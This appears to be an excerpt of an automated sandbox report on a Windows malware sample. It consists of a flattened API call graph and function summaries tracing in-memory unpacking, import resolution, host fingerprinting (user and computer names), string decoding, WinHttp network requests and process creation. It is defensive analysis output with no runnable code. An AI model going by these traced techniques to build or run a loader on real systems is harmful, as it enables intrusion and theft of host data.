API calls x_ismbbtype_l 22977->22985 22978 404aba 22978->22859 22978->22861 22979 406de8 76 API calls _parse_cmdline 22979->22980 22980->22978 22980->22979 22982 406d80 22981->22982 22983 406d87 22981->22983 22986 406bdd 22982->22986 22983->22854 22985->22977 22987 406be9 __mtinitlocknum 22986->22987 23017 405223 22987->23017 22991 406bfc 23038 40697c 22991->23038 22994 40654c __malloc_crt 66 API calls 22995 406c1d 22994->22995 22996 406d3c __mtinitlocknum 22995->22996 23045 4069f8 22995->23045 22996->22983 22999 406d49 22999->22996 23004 406d5c 22999->23004 23059 4064be 66 API calls 5 library calls 22999->23059 23000 406c4d InterlockedDecrement 23001 406c5d 23000->23001 23002 406c6e InterlockedIncrement 23000->23002 23001->23002 23055 4064be 66 API calls 5 library calls 23001->23055 23002->22996 23003 406c84 23002->23003 23003->22996 23056 405978 66 API calls 2 library calls 23003->23056 23060 405b4a 66 API calls __getptd_noexit 23004->23060 23008 406c6d 23008->23002 23011 406c98 InterlockedDecrement 23012 406d14 23011->23012 23013 406d27 InterlockedIncrement 23011->23013 23012->23013 23057 4064be 66 API calls 5 library calls 23012->23057 23058 406d3e LeaveCriticalSection _doexit 23013->23058 23016 406d26 23016->23013 23061 4051aa GetLastError 23017->23061 23019 40522b 23020 405238 23019->23020 23076 404205 66 API calls 3 library calls 23019->23076 23022 406851 23020->23022 23023 40685d __mtinitlocknum 23022->23023 23024 405223 __getptd 66 API calls 23023->23024 23025 406862 23024->23025 23027 406874 23025->23027 23087 405978 66 API calls 2 library calls 23025->23087 23030 406882 __mtinitlocknum 23027->23030 23086 404205 66 API calls 3 library calls 23027->23086 23028 406892 23029 4068db 23028->23029 23031 4068c3 InterlockedIncrement 23028->23031 23032 4068a9 InterlockedDecrement 23028->23032 23089 4068ec LeaveCriticalSection _doexit 23029->23089 23030->22991 23031->23029 23032->23031 23035 4068b4 23032->23035 23035->23031 23088 4064be 66 API calls 5 library calls 23035->23088 23037 4068c2 23037->23031 23090 4068f5 23038->23090 23041 4069b9 23043 4069be GetACP 23041->23043 23044 4069ab 23041->23044 23042 40699b GetOEMCP 23042->23044 23043->23044 23044->22994 23044->22996 23046 40697c getSystemCP 78 API calls 23045->23046 23048 406a18 23046->23048 23047 406a23 setSBCS 23109 407f4e 23047->23109 23048->23047 23049 406a8c _memset __setmbcp_nolock 23048->23049 23051 406a67 IsValidCodePage 23048->23051 23099 4066be GetCPInfo 23049->23099 23051->23047 23053 406a79 GetCPInfo 23051->23053 23052 406bdb 23052->22999 23052->23000 23053->23047 23053->23049 23055->23008 23056->23011 23057->23016 23058->22996 23059->23004 23060->22996 23077 405052 TlsGetValue 23061->23077 23064 405217 SetLastError 23064->23019 23065 406591 __calloc_crt 63 API calls 23066 4051d5 23065->23066 23066->23064 23067 4051dd 23066->23067 23082 404fd7 6 API calls __crt_waiting_on_module_handle 23067->23082 23069 4051ef 23070 4051f6 23069->23070 23071 40520e 23069->23071 23083 4050c3 66 API calls 5 library calls 23070->23083 23084 4064be 66 API calls 5 library calls 23071->23084 23074 4051fe GetCurrentThreadId 23074->23064 23075 405214 23075->23064 23076->23020 23078 405082 23077->23078 23079 405067 23077->23079 23078->23064 23078->23065 23085 404fd7 6 API calls __crt_waiting_on_module_handle 23079->23085 23081 405072 TlsSetValue 23081->23078 23082->23069 23083->23074 23084->23075 23085->23081 23086->23030 23087->23028 23088->23037 23089->23027 23091 406908 23090->23091 23095 406955 23090->23095 23092 405223 __getptd 66 API calls 23091->23092 23093 40690d 23092->23093 23094 406935 23093->23094 23098 407414 74 API calls 5 library calls 23093->23098 23094->23095 23097 406851 _LocaleUpdate::_LocaleUpdate 68 API calls 23094->23097 23095->23041 23095->23042 23097->23095 23098->23094 23103 4066f2 _memset 23099->23103 23108 4067a4 23099->23108 23102 407f4e __setmbcp_nolock 5 API calls 23106 40684f 23102->23106 23117 408d1c 23103->23117 23106->23049 23107 408b1d ___crtLCMapStringA 101 API calls 23107->23108 23108->23102 23110 407f56 23109->23110 23111 407f58 IsDebuggerPresent 23109->23111 23110->23052 23210 4081ca 23111->23210 23114 409742 SetUnhandledExceptionFilter UnhandledExceptionFilter 23115 409767 GetCurrentProcess TerminateProcess 23114->23115 23116 40975f __invoke_watson 23114->23116 23115->23052 23116->23115 23118 4068f5 _LocaleUpdate::_LocaleUpdate 76 API calls 23117->23118 23119 408d2f 23118->23119 23127 408b62 23119->23127 23122 408b1d 23123 4068f5 _LocaleUpdate::_LocaleUpdate 76 API calls 23122->23123 23124 408b30 23123->23124 23155 408778 23124->23155 23128 408b83 GetStringTypeW 23127->23128 23129 408bae 23127->23129 23131 408ba3 GetLastError 23128->23131 23132 408b9b 23128->23132 23130 408c95 23129->23130 23129->23132 23152 409a8c 90 API calls 2 library calls 23130->23152 23131->23129 23133 408be7 MultiByteToWideChar 23132->23133 23150 408c8f 23132->23150 23140 408c14 23133->23140 23133->23150 23135 408cb9 23139 408ce6 GetStringTypeA 23135->23139 23135->23150 23153 409ad5 73 API calls 8 library calls 23135->23153 23136 408c29 _memset __alloca_probe_16 23142 408c62 MultiByteToWideChar 23136->23142 23136->23150 23137 407f4e __setmbcp_nolock 5 API calls 23138 40675f 23137->23138 23138->23122 23143 408d01 23139->23143 23139->23150 23140->23136 23144 408375 _malloc 66 API calls 23140->23144 23146 408c78 GetStringTypeW 23142->23146 23147 408c89 23142->23147 23154 4064be 66 API calls 5 library calls 23143->23154 23144->23136 23145 408cda 23145->23139 23145->23150 23146->23147 23151 408306 66 API calls __mtinitlocknum 23147->23151 23150->23137 23151->23150 23152->23135 23153->23145 23154->23150 23156 408799 LCMapStringW 23155->23156 23160 4087b4 23155->23160 23157 4087bc GetLastError 23156->23157 23156->23160 23157->23160 23158 4089b2 23204 409a8c 90 API calls 2 library calls 23158->23204 23159 40880e 23161 408827 MultiByteToWideChar 23159->23161 23182 4089a9 23159->23182 23160->23158 23160->23159 23169 408854 23161->23169 23161->23182 23163 407f4e __setmbcp_nolock 5 API calls 23165 40677f 23163->23165 23164 4089da 23166 4089f3 23164->23166 23167 408ace LCMapStringA 23164->23167 23164->23182 23165->23107 23205 409ad5 73 API calls 8 library calls 23166->23205 23201 408a2a 23167->23201 23168 4088a5 MultiByteToWideChar 23172 4088be LCMapStringW 23168->23172 23194 4089a0 23168->23194 23174 408375 _malloc 66 API calls 23169->23174 23179 40886d __alloca_probe_16 23169->23179 23171 408a05 23175 408a0f LCMapStringA 23171->23175 23171->23182 23177 4088df 23172->23177 23172->23194 23173 408af5 23173->23182 23209 4064be 66 API calls 5 library calls 23173->23209 23174->23179 23185 408a31 23175->23185 23175->23201 23180 4088e8 23177->23180 23187 408911 23177->23187 23179->23168 23179->23182 23183 4088fa LCMapStringW 23180->23183 23180->23194 23182->23163 23183->23194 23184 408a42 _memset __alloca_probe_16 23192 408a80 LCMapStringA 23184->23192 23184->23201 23185->23184 23189 408375 _malloc 66 API calls 23185->23189 23186 408960 LCMapStringW 23190 40899a 23186->23190 23193 408978 WideCharToMultiByte 23186->23193 23188 408375 _malloc 66 API calls 23187->23188 23197 40892c __alloca_probe_16 23187->23197 23188->23197 23189->23184 23202 408306 66 API calls __mtinitlocknum 23190->23202 23195 408aa0 23192->23195 23196 408a9c 23192->23196 23193->23190 23203 408306 66 API calls __mtinitlocknum 23194->23203 23206 409ad5 73 API calls 8 library calls 23195->23206 23207 408306 66 API calls __mtinitlocknum 23196->23207 23197->23186 23197->23194 23201->23173 23208 4064be 66 API calls 5 library calls 23201->23208 23202->23194 23203->23182 23204->23164 23205->23171 23206->23196 23207->23201 23208->23173 23209->23182 23210->23114 23211->22874 23212->22877 23213->22871 23214->22871 23216 405ca1 23215->23216 23217 404f5c __encode_pointer 6 API calls 23216->23217 23218 405cb9 23216->23218 23217->23216 23218->22882 23219->22884 23260 6158e5 24 API calls CallUnexpected 23304 4041c7 SetUnhandledExceptionFilter 23239 405049 TlsAlloc 23282 62396b 15 API calls _free 23261 6156eb 46 API calls __RTC_Initialize 23242 62806f 38 API calls __fassign 22352 401450 22354 40145e 22352->22354 22353 40177f 22354->22353 22355 4017cb VirtualAlloc 22354->22355 22358 4017f8 22355->22358 22356 401fa6 LoadLibraryA 22357 401fe3 22356->22357 22356->22358 22359 402033 GetProcAddress 22357->22359 22362 4020c5 22357->22362 22358->22353 22358->22356 22358->22362 22360 40200e 22359->22360 22361 40207b GetProcAddress 22359->22361 22360->22357 22361->22360 22363 402210 GetPEB 22362->22363 22368 40210a VirtualProtect 22362->22368 22364 4029ad CreateThread 22363->22364 22365 40296e 22363->22365 22366 402b7e WaitForSingleObject 22364->22366 22367 402b5e Sleep 22364->22367 22372 61592c 22364->22372 22369 402983 lstrlenW 22365->22369 22366->22353 22370 402b7b 22367->22370 22369->22364 22370->22366 22375 615b87 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 22372->22375 22374 615931 22374->22374 22375->22374 23283 402d50 GetModuleHandleA GetProcAddress VirtualProtect 23220 4020e5 23221 4020f4 23220->23221 23222 402210 GetPEB 23221->23222 23227 40210a VirtualProtect 23221->23227 23223 4029ad CreateThread 23222->23223 23224 40296e 23222->23224 23225 402b7e WaitForSingleObject 23223->23225 23226 402b5e Sleep 23223->23226 23232 61592c 4 API calls ___security_init_cookie 23223->23232 23229 402983 lstrlenW 23224->23229 23228 402d3b 23225->23228 23230 402b7b 23226->23230 23229->23223 23230->23225 23285 626d02 28 API calls _free 23306 618dc7 7 API calls ___scrt_uninitialize_crt 23286 627f4a 38 API calls 2 library calls 23287 622949 15 API calls 23243 5c5670 7 API calls __fassign 23244 615e4d 47 API calls _unexpected 23269 627ed2 WideCharToMultiByte __fassign 23308 407ff0 5 API calls 2 library calls 23310 62dbd7 IsProcessorFeaturePresent 23288 40417b 5 API calls ___security_init_cookie 23289 622359 16 API calls _free 23290 40977c RtlUnwind 23272 622adf GetCommandLineA GetCommandLineW 23273 626edd 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23245 621e22 FreeLibrary 23274 5c149f 40 API calls 23275 406084 SetLastError __mtinitlocknum 23291 61b724 37 API calls _unexpected 23312 404185 68 API calls __CxxUnhandledExceptionFilter 23276 626ea9 26 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23315 405590 6 API calls 3 library calls 22376 6157b0 22377 6157bc ___scrt_is_nonwritable_in_current_image 22376->22377 22402 615a5b 22377->22402 22379 6157c3 22380 615916 22379->22380 22388 6157ed ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 22379->22388 22418 615d35 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 22380->22418 22382 61591d 22383 615923 22382->22383 22419 61b466 23 API calls CallUnexpected 22382->22419 22420 61b47c 23 API calls CallUnexpected 22383->22420 22386 61592b 22387 61580c 22388->22387 22392 61588d 22388->22392 22417 61b4b0 37 API calls 3 library calls 22388->22417 22390 615893 22414 60f790 22390->22414 22413 615cae GetStartupInfoW CallUnexpected 22392->22413 22403 615a64 22402->22403 22421 615f48 IsProcessorFeaturePresent 22403->22421 22405 615a70 22422 61644d 10 API calls 2 library calls 22405->22422 22407 615a75 22408 615a79 22407->22408 22423 618e3a 22407->22423 22408->22379 22411 615a90 22411->22379 22413->22390 22493 60f770 22414->22493 22417->22392 22418->22382 22419->22383 22420->22386 22421->22405 22422->22407 22427 62331c 22423->22427 22426 61646c 7 API calls 2 library calls 22426->22408 22428 615a82 22427->22428 22429 62332c 22427->22429 22428->22411 22428->22426 22429->22428 22432 622a2b 22429->22432 22437 6228e9 22429->22437 22433 622a32 22432->22433 22434 622a75 GetStdHandle 22433->22434 22435 622adb 22433->22435 22436 622a88 GetFileType 22433->22436 22434->22433 22435->22429 22436->22433 22438 6228f5 ___scrt_is_nonwritable_in_current_image 22437->22438 22449 622310 EnterCriticalSection 22438->22449 22440 6228fc 22450 625431 22440->22450 22445 622915 22447 622a2b 2 API calls 22445->22447 22446 62292b 22446->22429 22448 62291a 22447->22448 22464 622940 LeaveCriticalSection CallUnexpected 22448->22464 22449->22440 22451 62543d ___scrt_is_nonwritable_in_current_image 22450->22451 22452 625446 22451->22452 22453 625467 22451->22453 22473 61c299 14 API calls _free 22452->22473 22465 622310 EnterCriticalSection 22453->22465 22456 62544b 22474 6233b5 25 API calls ___std_exception_copy 22456->22474 22458 62549f 22475 6254c6 LeaveCriticalSection CallUnexpected 22458->22475 22459 62290b 22459->22448 22463 622975 28 API calls 22459->22463 22462 625473 22462->22458 22466 625381 22462->22466 22463->22445 22464->22446 22465->22462 22476 625515 22466->22476 22468 6253a0 22484 6232e2 22468->22484 22469 625393 22469->22468 22483 621fd3 6 API calls _free 22469->22483 22472 6253f5 22472->22462 22473->22456 22474->22459 22475->22459 22477 625522 _free 22476->22477 22478 625562 22477->22478 22479 62554d RtlAllocateHeap 22477->22479 22490 6235a5 EnterCriticalSection LeaveCriticalSection _free 22477->22490 22491 61c299 14 API calls _free 22478->22491 22479->22477 22480 625560 22479->22480 22480->22469 22483->22469 22485 623316 _free 22484->22485 22486 6232ed RtlFreeHeap 22484->22486 22485->22472 22486->22485 22487 623302 22486->22487 22492 61c299 14 API calls _free 22487->22492 22489 623308 GetLastError 22489->22485 22490->22477 22491->22480 22492->22489 22502 5c66d0 22493->22502 22501 60f784 ExitProcess 22503 5c66e2 ___scrt_uninitialize_crt 22502->22503 22504 5c672c ExitProcess 22503->22504 22505 5c673b 22503->22505 22506 5c6759 GetModuleFileNameW CreateFileW 22505->22506 22508 5c6744 22505->22508 22507 5c67d1 22506->22507 22506->22508 22509 5c6824 22507->22509 22510 5c6826 CloseHandle 22507->22510 22521 5f6ce0 22508->22521 22575 61d764 22509->22575 22510->22508 22513 5c68ce 22514 5c68f8 22513->22514 22515 5c68d3 22513->22515 22582 61d6c5 22514->22582 22585 5c6930 LoadLibraryA GetProcAddress ExitProcess __fassign 22515->22585 22518 5c68da 22519 61d6c5 ___std_exception_copy 14 API calls 22518->22519 22520 5c68e6 22519->22520 22520->22508 22524 5f6cf3 22521->22524 22523 5f6cfd 22526 5c1300 22523->22526 22524->22523 22588 60c840 22524->22588 22591 5f6830 22524->22591 22527 5c1309 GetUserNameW 22526->22527 22528 5c1341 22527->22528 22529 5c1343 22527->22529 22535 60d650 22528->22535 22529->22528 22530 5c135b GetComputerNameW 22529->22530 22532 5c1382 22530->22532 22534 5c1380 22530->22534 22532->22534 22659 5c1000 ExitProcess 22532->22659 22534->22528 22536 60d65e 22535->22536 22660 6148e0 22536->22660 22540 60e229 CallUnexpected _strlen 22541 60e24a 22540->22541 22542 60e38e 22540->22542 22557 61d764 15 API calls ___std_exception_copy 22540->22557 22558 61d78f 39 API calls _mbstowcs 22540->22558 22563 61da4e 37 API calls 22540->22563 22564 5f6f30 68 API calls 22540->22564 22565 5f7050 81 API calls 22540->22565 22566 61d6c5 14 API calls ___std_exception_copy 22540->22566 22573 60f1a1 __fassign CallUnexpected 22540->22573 22695 5d3120 55 API calls 2 library calls 22540->22695 22696 5c32a0 105 API calls 4 library calls 22540->22696 22697 60fb30 59 API calls 2 library calls 22540->22697 22698 60f710 GetSystemTimeAsFileTime 22540->22698 22699 61da3c 37 API calls _unexpected 22540->22699 22541->22501 22701 60d600 116 API calls 22542->22701 22544 60f5ce 22702 5f6f30 68 API calls ___std_exception_copy 22544->22702 22546 60f5e4 22703 611e80 58 API calls 5 library calls 22546->22703 22548 60f5ef 22704 6115f0 38 API calls 4 library calls 22548->22704 22551 60f5f7 22553 60f62e 22551->22553 22705 610590 56 API calls 22551->22705 22706 5f7050 81 API calls 2 library calls 22553->22706 22554 60f67a 22554->22541 22555 60f6ed 22554->22555 22707 610700 48 API calls __fassign 22555->22707 22557->22540 22558->22540 22563->22540 22564->22540 22565->22540 22566->22540 22567 60f379 LoadLibraryW 22567->22540 22568 60f250 CreateProcessW CloseHandle 22568->22540 22569 61d78f 39 API calls _mbstowcs 22569->22573 22571 5f65e0 28 API calls 22571->22573 22573->22540 22573->22567 22573->22568 22573->22569 22573->22571 22574 60f4f4 CreateProcessW CloseHandle 22573->22574 22700 60f720 42 API calls 22573->22700 22574->22540 22580 623a7f _free 22575->22580 22576 623abd 22587 61c299 14 API calls _free 22576->22587 22578 623aa8 RtlAllocateHeap 22579 5c6857 ReadFile FindCloseChangeNotification 22578->22579 22578->22580 22579->22513 22580->22576 22580->22578 22586 6235a5 EnterCriticalSection LeaveCriticalSection _free 22580->22586 22583 6232e2 _free 14 API calls 22582->22583 22584 61d6dd 22583->22584 22584->22508 22585->22518 22586->22580 22587->22579 22615 60c700 22588->22615 22592 5f683e CallUnexpected _strlen 22591->22592 22626 61d76f 22592->22626 22595 5f696b WinHttpConnect 22596 5f6969 22595->22596 22597 5f69b8 WinHttpOpenRequest 22596->22597 22598 5f69b6 22596->22598 22597->22598 22599 5f6a1f 22598->22599 22600 5f6a21 WinHttpSendRequest 22598->22600 22601 5f6a71 WinHttpReceiveResponse 22599->22601 22605 5f6a8e 22599->22605 22600->22599 22601->22605 22602 5f6aa3 WinHttpQueryDataAvailable 22602->22605 22603 5f6b80 22603->22524 22604 5f6aca 22604->22603 22607 5f6bf9 22604->22607 22608 5f6bf7 22604->22608 22605->22602 22605->22604 22606 5f6b12 WinHttpReadData 22605->22606 22606->22605 22629 5f66e0 15 API calls 3 library calls 22607->22629 22610 5f6c6a WinHttpCloseHandle 22608->22610 22611 5f6c78 22608->22611 22610->22611 22612 5f6c87 22611->22612 22613 5f6c8b WinHttpCloseHandle 22611->22613 22612->22603 22614 5f6ca6 WinHttpCloseHandle 22612->22614 22613->22612 22614->22603 22624 61dc70 22615->22624 22618 60c764 22618->22524 22619 60c77b 22620 61d764 ___std_exception_copy 15 API calls 22619->22620 22621 60c794 CryptStringToBinaryA 22620->22621 22621->22618 22622 60c7eb 22621->22622 22623 61d6c5 ___std_exception_copy 14 API calls 22622->22623 22623->22618 22625 60c719 CryptStringToBinaryA 22624->22625 22625->22618 22625->22619 22630 61d7b9 22626->22630 22629->22603 22631 61d7d0 22630->22631 22632 61d7d4 22631->22632 22633 61d80f 22631->22633 22651 618f7e 37 API calls 2 library calls 22632->22651 22653 61c299 14 API calls _free 22633->22653 22635 61d814 22654 6233b5 25 API calls ___std_exception_copy 22635->22654 22638 61d7f1 22639 61d820 22638->22639 22640 61d802 22638->22640 22655 61d899 39 API calls 4 library calls 22639->22655 22652 61c299 14 API calls _free 22640->22652 22643 61d82e 22644 61d836 22643->22644 22647 61d848 22643->22647 22656 61c299 14 API calls _free 22644->22656 22648 5f68e0 WinHttpOpen 22647->22648 22657 61c299 14 API calls _free 22647->22657 22648->22595 22648->22596 22650 61d807 22658 6233b5 25 API calls ___std_exception_copy 22650->22658 22651->22638 22652->22650 22653->22635 22654->22648 22655->22643 22656->22648 22657->22650 22658->22648 22659->22534 22661 614907 CallUnexpected _strlen 22660->22661 22662 61d76f 39 API calls 22661->22662 22663 614940 WinHttpOpen 22662->22663 22664 6149b7 WinHttpConnect 22663->22664 22665 6149e9 22663->22665 22664->22665 22667 6149f0 WinHttpOpenRequest 22665->22667 22668 614a3a CallUnexpected 22665->22668 22667->22668 22708 611510 22668->22708 22670 614a9a _unexpected 22672 614ab7 wsprintfW WinHttpAddRequestHeaders 22670->22672 22675 614b0f _strlen 22670->22675 22671 614b7b 22673 614b84 WinHttpReceiveResponse 22671->22673 22681 614ba4 22671->22681 22674 61d6c5 ___std_exception_copy 14 API calls 22672->22674 22673->22681 22674->22675 22675->22671 22678 614b38 WinHttpSendRequest 22675->22678 22676 614bc5 WinHttpQueryDataAvailable 22676->22681 22677 614cdb 22680 614cf6 22677->22680 22682 614ce4 WinHttpCloseHandle 22677->22682 22678->22671 22679 614cc9 WinHttpCloseHandle 22679->22677 22683 614d11 22680->22683 22684 614cff WinHttpCloseHandle 22680->22684 22681->22676 22686 614c30 WinHttpReadData 22681->22686 22688 614bb8 22681->22688 22682->22680 22685 60c840 17 API calls 22683->22685 22684->22683 22687 614d1d 22685->22687 22686->22681 22689 61d6c5 ___std_exception_copy 14 API calls 22687->22689 22688->22677 22688->22679 22690 60e21a 22688->22690 22689->22690 22691 5c13c0 22690->22691 22692 5c13c9 22691->22692 22693 5c13dd 22692->22693 22740 5c1430 40 API calls 22692->22740 22693->22540 22695->22540 22696->22540 22697->22540 22698->22540 22699->22540 22700->22573 22701->22544 22702->22546 22703->22548 22704->22551 22705->22553 22706->22554 22711 611540 22708->22711 22712 61154b 22711->22712 22715 619035 22712->22715 22718 619383 22715->22718 22717 611530 22717->22670 22719 6193a3 22718->22719 22720 61938e 22718->22720 22722 6193e5 22719->22722 22725 6193b1 22719->22725 22734 61c299 14 API calls _free 22720->22734 22738 61c299 14 API calls _free 22722->22738 22724 619393 22735 6233b5 25 API calls ___std_exception_copy 22724->22735 22736 61a29c 44 API calls 4 library calls 22725->22736 22726 6193dd 22739 6233b5 25 API calls ___std_exception_copy 22726->22739 22729 61939e 22729->22717 22730 6193c9 22732 6193f5 22730->22732 22737 61c299 14 API calls _free 22730->22737 22732->22717 22734->22724 22735->22729 22736->22730 22737->22726 22738->22726 22739->22732 22740->22693 23250 623a33 71 API calls 2 library calls 23295 62233e GetProcessHeap 23252 626c3f 11 API calls ___std_exception_copy 23278 62d6bf 20 API calls 23296 5d6900 15 API calls ___std_exception_copy 23233 402d9e 23234 402da7 23233->23234 23235 402db1 23234->23235 23236 402ed8 GetModuleHandleA GetProcAddress VirtualProtect 23234->23236 23237 402fb2 23236->23237 23279 6294bd 52 API calls 2 library calls 23318 626380 25 API calls 2 library calls 23254 5f4e30 64 API calls ___scrt_uninitialize_crt 23280 616490 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23321 622b90 47 API calls 23322 628396 45 API calls 2 library calls 23255 62ca19 53 API calls 3 library calls 23281 62229e 7 API calls 23256 40523d 75 API calls 5 library calls 23298 40413d 66 API calls __XcptFilter 23299 5d6920 14 API calls ___std_exception_copy 23300 622f1f LeaveCriticalSection CallUnexpected 23301 62c91c 26 API calls std::exception::exception 23324 61579e 26 API calls

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 136 401450-40145c 137 401463-40177d call 401000 136->137 138 40145e 136->138 144 401789-4017ae 137->144 145 40177f-401784 137->145 138->137 139 401460 138->139 139->137 147 4017b0-4017ba 144->147 148 4017bc-4017c5 144->148 146 402d3b-402d41 145->146 149 4017cb-4017f6 VirtualAlloc 147->149 148->149 150 401813-401a3e call 401430 149->150 151 4017f8-401807 149->151 155 401a40 150->155 156 401a45-401b97 150->156 151->150 152 401809-40180e 151->152 152->146 155->156 157 401a42 155->157 159 401ba8-401bb8 156->159 157->156 160 401c09-401ca0 159->160 161 401bba-401c07 call 401430 159->161 163 401dc6-401f7b 160->163 164 401ca6-401ccd 160->164 161->159 166 401f8c-401fa0 163->166 165 401cd7-401ce3 164->165 165->163 168 401ce9-401d2a 165->168 169 401fa6-401fdf LoadLibraryA 166->169 170 4020ca 166->170 172 401d3b-401d47 168->172 175 401fe1 169->175 176 401fe3-40200c 169->176 173 4020d1-402104 170->173 174 4020cc 170->174 177 401da0-401dc1 172->177 178 401d49-401d58 172->178 192 402210-40296c GetPEB 173->192 193 40210a-402139 173->193 174->173 179 4020ce 174->179 175->166 181 40201d-40202d 176->181 177->165 184 401d5a-401d8c 178->184 185 401d8f-401d9e 178->185 179->173 182 402033-402079 GetProcAddress 181->182 183 4020c5 181->183 187 402098-4020c0 182->187 188 40207b-402092 GetProcAddress 182->188 183->170 184->185 185->172 187->181 188->187 194 4029ad-402b5c CreateThread 192->194 195 40296e-4029aa call 401430 lstrlenW 192->195 196 402162-40216e 193->196 197 40213b-402147 193->197 202 402b7e-402d39 WaitForSingleObject 194->202 203 402b5e-402b7b Sleep call 401430 194->203 195->194 198 402170-40217c 196->198 199 40218a-402195 196->199 197->196 201 402149-402154 197->201 198->199 204 40217e-402188 198->204 205 4021b1-4021bd 199->205 206 402197-4021a3 199->206 201->196 208 402156-402160 201->208 202->146 203->202 211 4021c9-40220b VirtualProtect 204->211 205->211 213 4021bf 205->213 206->205 212 4021a5-4021af 206->212 208->211 212->211 213->211
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 004017E3
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: $MZx
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1316729395
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2588e99f776bf45b4239edc2faf0be46d4a3fba49149700422781b86762e8510
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 41943d6f200ca8c9ccc6406f3e96663368b91ad62feb103387bd3ee0cf9046f5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2588e99f776bf45b4239edc2faf0be46d4a3fba49149700422781b86762e8510
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36D28D37D117294BE7148A3CCC857A8A522EBD9320F51E772D82DEF6E4C7388D858B85
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 356 5c1300-5c133f GetUserNameW 358 5c1341 356->358 359 5c1343-5c1359 call 5c1290 356->359 360 5c13ac-5c13b7 358->360 359->360 364 5c135b-5c137e GetComputerNameW 359->364 366 5c1380 364->366 367 5c1382-5c1398 call 5c1290 364->367 366->360 370 5c13aa 367->370 371 5c139a-5c13a7 call 5c1000 367->371 370->360 371->370
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Name$ComputerUser
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4229901323-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 61be4a2b25dd3846e076717352d5aef386522d8764e779876536de931ac540f2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4f0802f9ead4099dd5f6043b2130257739bd73d777ce39a0c98c38734c06f860
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61be4a2b25dd3846e076717352d5aef386522d8764e779876536de931ac540f2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3116DF58047429FDB106FA8E949A6ABFA4FB42B55F100C3DE48686602E7318554CB97
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • 7d98652ded8515eb4124c533a671c7aa, xrefs: 00614A78
